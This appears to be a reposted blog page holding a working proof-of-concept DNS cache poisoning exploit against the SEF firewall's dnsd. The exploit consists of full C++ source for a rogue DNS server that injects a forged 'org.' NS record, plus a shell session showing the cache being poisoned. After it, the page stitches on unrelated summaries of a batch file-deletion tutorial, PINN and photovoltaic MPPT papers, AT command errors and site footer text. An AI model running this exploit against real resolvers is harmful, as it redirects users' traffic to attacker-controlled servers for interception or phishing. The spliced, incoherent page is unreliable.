PoC poisoning cache attack SEF 8 and later

本文介绍了一种PoC DNS缓存中毒攻击方法,通过自定义DNS服务器回应特定域名查询来实现。该攻击利用了DNS缓存机制,使得目标DNS服务器误将恶意IP作为权威名称服务器。
#########################################################
# Begin poc.cpp
#########################################################

// PoC poisoning cache attack SEF 8 and later (by fryxar)
// Requires poslib 1.0.4 library
// Compile: g++ `poslib-config --libs --cflags --server` poc.cpp -o poc

#define POS_DEFAULTLOG
#define POS_DEFAULTLOG_STDERR
#define POS_DEFAULTLOG_SYSLOG

// Server include file
#include <poslib/server/server.h>

// For signal handling
#include <stdlib.h>
#include <signal.h>

char *dyndomain;

DnsMessage *my_handle_query(pending_query *query);

void cleanup(int sig) {
// close down the server system
pos_setquitflag();
}

int main(int argc, char **argv) {
_addr a;

try {
  /* get command-line arguments */
  if (argc != 2 ) {
    printf( "Usage: %s [domainname]/n", argv[0] );
    return 1;
  } else {
    dyndomain = argv[1];
    txt_to_addr(&a, "any");
  }

  poslib_config_init();

  /* bring up posadis */
  servers.push_front(ServerSocket(ss_udp, udpcreateserver(&a)));

  // use the posadis logging system
  pos_log(context_none, log_info, "Proof of concept DNS server starting
up...");

  // set signal handlers
  signal(SIGINT, cleanup);
  signal(SIGTERM, cleanup);

  // set query function
  handle_query = my_handle_query;

  // run server
  posserver_run();
} catch (PException p) {
  printf("Fatal exception: %s/n", p.message);
  return 1;
}

return 0;
}

/* the entry function which will handle all queries */
DnsMessage *my_handle_query(pending_query *query) {
DnsMessage *a = new DnsMessage();
DnsQuestion q;
DnsRR rr;

/* set a as an answer to the query */
a->ID = query->message->ID;
a->RD = query->message->RD;
a->RA = false;

if (query->message->questions.begin() ==
query->message->questions.end()) {
  /* query did not contain question */
  a->RCODE = RCODE_QUERYERR;
  return a;
}
q = *query->message->questions.begin();
a->questions.push_back(q);
a->QR = true;

pos_log(context_server, log_info, "Query: [%s,%s]", q.QNAME.tocstr(),
str_qtype(q.QTYPE).c_str());

if (q.QTYPE == DNS_TYPE_A && q.QNAME == dyndomain) {
  rr = DnsRR(dyndomain, DNS_TYPE_A, CLASS_IN, 3600);
  string data = rr_fromstring(DNS_TYPE_A, "200.200.200.200"); //
Anything...
  rr.RDLENGTH = data.size();
  rr.RDATA = (char *)memdup(data.c_str(), data.size());
  a->answers.push_back(rr);

  rr = DnsRR("org", DNS_TYPE_NS, CLASS_IN, 3600);
  data = rr_fromstring(DNS_TYPE_NS, "fakedns.com");
  rr.RDLENGTH = data.size();
  rr.RDATA = (char *)memdup(data.c_str(), data.size());
  a->authority.push_back(rr);

  rr = DnsRR("fakedns.com", DNS_TYPE_A, CLASS_IN, 3600);
  data = rr_fromstring(DNS_TYPE_A, "200.200.200.201"); // Anything...
  rr.RDLENGTH = data.size();
  rr.RDATA = (char *)memdup(data.c_str(), data.size());
  a->additional.push_back(rr);
} else {
  /* we don't want this */
  a->RCODE = RCODE_SRVFAIL;
}
return a;
}
#########################################################
# End poc.cpp
#########################################################


fryxar.afraid.org # ./poc fryxar.afraid.org

    and now, in your SEF Firewall:

firewall # kill `ps -ef | awk '/[d]nsd/ { print $2 }'` # Cleaning the
cache

firewall # nslookup afraid.org 127.0.0.1  # Caching org. NS
Server:  localhost
Address:  127.0.0.1

Non-authoritative answer:
Name:    afraid.org
Addresses:  69.42.89.56, 69.42.89.53, 69.42.89.55, 69.42.89.54

firewall # kill -USR1 `ps -ef | awk '/[d]nsd/ { print $2 }'` # dnsd dump

firewall # sed -n '/^org.$/,/^[^ ]/p' /usr/adm/sg/dnsd.dat # show cached
"org." NS
org.
  172775      NS TLD2.ULTRADNS.NET.
  172775      NS TLD1.ULTRADNS.NET.
2.110.45.209.in-addr.jjc.com.pe.

firewall # nslookup fryxar.afraid.org 127.0.0.1 # Domain owned by my
poisoned DNS
Server:  localhost
Address:  127.0.0.1

Non-authoritative answer:
Name:    fryxar.afraid.org
Address:  200.200.200.200

firewall # kill -USR1 `ps -ef | awk '/[d]nsd/ { print $2 }'` # dnsd dump

firewall # sed -n '/^org.$/,/^[^ ]/p' /usr/adm/sg/dnsd.dat # show cached
"org." NS
org.
    3567      NS fakedns.com.           <- Ooohh!
    3567      NS TLD2.ULTRADNS.NET.
    3567      NS TLD1.ULTRADNS.NET.
2.110.45.209.in-addr.jjc.com.pe.

    And now SEF "thinks" that fakedns.com server is an authoritative
nameserver of "org." domain, learned by fryxar.afraid.org DNS server
that is only authoritative for the fryxar.afraid.org domain.
--
fryxar <fryxar@datafull.com> 
已经博主授权,源码转载自 https://pan.quark.cn/s/a4b39357ea24 ### 批处理脚本实现指定文件夹内所有文件与子目录的移除 #### 简介 在Windows系统环境下,批处理脚本是一种极具价值的应用工具,它能够协助用户执行一系列预先设定好的指令,达成自动化处理的目的。本说明着重阐述如何借助批处理脚本移除特定文件夹内的全部文件及子文件夹,并对几种常用技巧的效果进行剖析。 #### 批处理脚本的基础知识 批处理脚本是一种基于DOS命令行环境构建的文本性文档,其文件后缀为`.bat`。借助编写批处理脚本,使用者可以完成复杂任务流程的自动化,例如文件复制、移动、清除等动作。 #### 第一种方法:运用`RD`指令 `RD`指令专用于移除目录(即文件夹)。该指令的标准格式如下所示: ```batch RD [drive:]path [parameters] ``` 其中,`[drive:]path`代表待清除的目录路径,`[parameters]`为若干可选参数,常用的包括: - `/S`:递归式地移除目录及其所有嵌套子目录。 - `/Q`:执行静默模式,不进行确认提示。 ##### 示例1:直接运用`RD`指令 若采用`RD /S /Q c:\temp`指令来移除`C:\temp`目录中的所有文件及子文件夹,将连同`temp`目录本体一同被清除。 ```batch rd /s /q c:\temp ``` #### 第二种方法:灵活运用`RD`指令 为防止误删`temp`目录本身,可以通过先利用`RD`指令清空`temp`目录内的所有内容,随后重新构建`temp`目录的技巧来实现。 ##### 示例2:灵活运用`RD`指令 ```batch rd ...
内容概要:本文系统阐述了物理信息神经网络(PINNs)在求解布洛赫-托雷(Bloch-Torrey)方程中的具体应用,结合PyTorch框架提供了完整的Python代码实现。该方法通过将偏微分方程的物理规律嵌入神经网络的损失函数中,使模型在训练过程中同时满足初始条件、边界条件和控制方程,从而实现对复杂物理系统的高精度数值求解。文中详细介绍了网络架构设计、物理约束的数学表达与损失项构建、训练流程优化及求解结果的可视化分析,充分展现了PINNs在处理传统数值方法难以应对的高维、非线性及复杂几何域问题上的强大能力与独特优势。; 适合人群:具备深度学习理论基础与偏微分方程求解背景的研究生、科研人员及工程技术人员,尤其适合熟悉Python编程语言和PyTorch深度学习框架的学习者。; 使用场景及目标:①为求解布洛赫-托雷方程等复杂物理场问题提供一种高效、灵活的替代方案,克服传统有限元或有限差分法在网格划分和高维计算上的局限;②作为PINNs在传质、扩散-反应、医学成像等科学计算领域的典型应用案例,为相关研究提供技术参考;③推动数据驱动方法与第一性原理物理模型深度融合的科学研究范式发展。; 阅读建议:建议读者结合提供的代码进行逐模块运行与调试,重点理解如何将物理定律精确地转化为可微分的损失函数项,并鼓励尝试将其迁移至其他类似的偏微分方程求解任务中,以深化对PINNs核心思想与实现技巧的掌握。
内容概要:本文围绕基于双阀值区间扰动观察法与带预测模型模糊PID控制法的光伏MPPT(最大功率点跟踪)控制策略展开研究,旨在提升光伏发电系统在复杂环境下的动态响应速度与稳态精度。通过Simulink搭建完整的控制系统仿真模型,融合传统扰动观察法的快速性与模糊PID控制的自适应能力,引入双阀值区间机制有效抑制光照突变时的功率振荡,增强系统鲁棒性。研究详细分析了双阀值设定原则、模糊规则库构建方法以及预测模型在控制决策中的作用,并在多种工况下验证了该复合控制策略相较于传统方法在追踪效率、稳定性及抗干扰能力方面的优越性,具有较强的工程应用价值。; 适合人群:具备电力电子、自动控制理论及MATLAB/Simulink仿真基础,从事新能源发电、光伏逆变器开发、智能控制算法研究的研究生、科研人员及工程技术人员。; 使用场景及目标:①用于高性能光伏MPPT控制器的设计与优化;②为复合智能控制策略(如模糊控制+扰动观察法)在可再生能源系统中的应用提供理论依据与仿真范例;③支撑科研项目开发、高水平论文撰写或先进算法的复现与改进。; 阅读建议:建议结合文中所述仿真模型进行动手实践,重点探究双阀值参数整定与模糊推理机制对系统性能的影响,进一步可在多变环境(如快速阴影遮挡、温度波动)下开展鲁棒性测试,深化对智能MPPT控制机理的理解。
代码下载地址: https://pan.quark.cn/s/a4b39357ea24 AT命令(Attention command)是一系列用于控制调制解调器及其他通信设备的文本指令,这些指令通过串行接口发送至目标设备。CME(Command Mode Extensions)错误是在使用AT命令集与GSM模块进行通信时可能遇到的一种错误响应类型。在"+CME ERROR"标识之后,通常会附带一个错误代码,该代码能够指示出具体的错误状况,从而帮助开发者识别并处理相关故障。在深入探讨"+CME ERROR"的细节之前,有必要先熟悉一些基本概念。AT命令集最初由Hayes公司开发用于Smartmodem通信指令集,随后发展成为行业标准,并在GSM模块和电话设备中得到广泛采纳。AT命令集以"AT"(Attention)作为前缀,后面跟随具体指令,比如ATD用于发起通话,ATH用于终止通话等。 在AT命令集的框架内,CME错误属于扩展错误报告(+CEER)的一种形式。此类错误信息通常在模块无法执行某个特定指令,或者在执行指令过程中遭遇障碍时被返回。开发者可以通过参考模块的AT命令手册来获取错误代码的详细说明。 "CME ERROR"是由模块发出的错误信号,其含义为“移动设备错误”。这类错误信息对于从事移动硬件开发的人员来说至关重要,因为它们直接影响设备与模块之间的通信效率。开发者可以通过分析错误信息来优化代码,确保AT命令能够被准确执行。 文档中所提及的AT命令手册是针对固件版本4.33及以上版本的接口使用指南。手册内容涵盖了命令的概览、功能说明、信息反馈以及结果代码等。手册中的每一个AT命令都有其特定的用途,例如配置线路、请求SIM卡详情、控制电话功能、管理电话簿、报...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值